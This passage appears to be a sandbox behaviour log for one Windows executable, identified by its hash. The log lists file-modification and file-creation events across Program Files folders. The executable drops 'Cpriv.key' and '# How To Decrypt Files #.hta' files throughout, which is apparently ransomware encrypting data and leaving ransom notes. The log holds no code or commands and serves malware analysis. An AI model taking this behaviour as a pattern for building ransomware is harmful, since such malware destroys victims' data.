de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143743.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Stationery\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00076_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\OliveGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.ES.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Hand Prints.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00121_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLBAR.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\ICE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00211_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\BLENDS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00433_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGAD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Orange Circles.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\nb.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21299_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Msgbox.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02464_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Country.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\INCOMING.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_off.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\10.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Angles.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105600.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15168_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OIS_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONTACTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\flyout.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01627_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VGX\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\picturePuzzle.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01461_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\es\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\Parity.fx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18225_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\DataServices\+Connect to New Data Source.odc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\REMOTEL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Charitable Contributions.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Defender\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\THEMES.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14756_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Executive.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\sk.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OriginLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00648_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ClassicPhotoAlbum.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD 